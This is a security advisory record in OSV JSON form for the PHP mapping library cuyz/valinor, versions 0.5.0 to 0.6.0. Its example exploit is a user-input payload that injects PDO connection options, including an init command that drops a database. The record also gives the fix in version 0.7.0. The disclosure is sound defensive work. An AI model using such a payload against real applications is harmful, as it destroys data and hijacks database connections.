{"id":"GHSA-xhr8-mpwq-2rr2","summary":"Automatic named constructor discovery in Valinor","details":"## Design issue - automatic constructor discovery\n\nThe issue arises when upgrading from `cuyz/valinor:0.3.0` to a newer system on an existing application, which broke due to the wrong constructor being picked.\n\nStill, a bigger security concern is problematic, and it is akin to https://github.com/rails/rails/issues/5228.\n\n## Example exploit\n\nTake following DTO example:\n\n```php\nfinal class UserDTO\n{\n    public function __construct(\n        public int $id,\n        public string $name\n    ) {}\n    public static function fromDb(\n        PDO $connection,\n        int $id\n    ): self { /* ... code to fetch the DTO here ... */ }\n}\n```\n\nThere is nothing inherently unsafe about the above `UserDTO`, but when mixed with `cuyz/valinor:^0.5.0` ( specifically https://github.com/CuyZ/Valinor/commit/718d3c1bc2ea7d28b4b1f6c062addcd1dde8660b ), it is an explosive mix:\n\n```php\n// this could be coming from user input:\n$maliciousPayload = [\n    'connection' =\u003e [\n      'dsn' =\u003e 'mysql:host=some-host;database=some-database',\n      'username' =\u003e 'root',\n      'password' =\u003e 'root',\n      'options' =\u003e [\n        // PDO::MYSQL_ATTR_INIT_COMMAND === 1002\n        1002 =\u003e 'DROP DATABASE all-the-moneys'\n      ]\n    ],\n    'id' =\u003e 123,\n];\n\n$treeMapper-\u003emap(\n  UserDTO::class,\n  $maliciousPayload\n); // your DB is gone :D\n```\n\nThe above payload is represented in PHP form, but may as well be input JSON, HTML or x-form-urlencoded.\n\n## Mitigation\n\nVersion 0.7.0 contains a patch for this issue.\n\nAutomatic named constructor resolution should be disabled - only explicitly mapped named constructors should be used/discovered.","modified":"2024-12-05T05:34:24.161317Z","published":"2022-04-01T13:39:45Z","database_specific":{"severity":"HIGH","github_reviewed":true,"github_reviewed_at":"2022-04-01T13:39:45Z","nvd_published_at":null,"cwe_ids":[]},"references":[{"type":"WEB","url":"https://github.com/CuyZ/Valinor/security/advisories/GHSA-xhr8-mpwq-2rr2"},{"type":"WEB","url":"https://github.com/CuyZ/Valinor/commit/718d3c1bc2ea7d28b4b1f6c062addcd1dde8660b"},{"type":"PACKAGE","url":"https://github.com/CuyZ/Valinor"},{"type":"WEB","url":"https://github.com/CuyZ/Valinor/releases/tag/0.7.0"}],"affected":[{"package":{"name":"cuyz/valinor","ecosystem":"Packagist","purl":"pkg:composer/cuyz/valinor"},"ranges":[{"type":"ECOSYSTEM","events":[{"introduced":"0.5.0"},{"fixed":"0.7.0"}]}],"versions":["0.5.0","0.6.0"],"database_specific":{"source":"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/04/GHSA-xhr8-mpwq-2rr2/GHSA-xhr8-mpwq-2rr2.json"}}],"schema_version":"1.9.0"}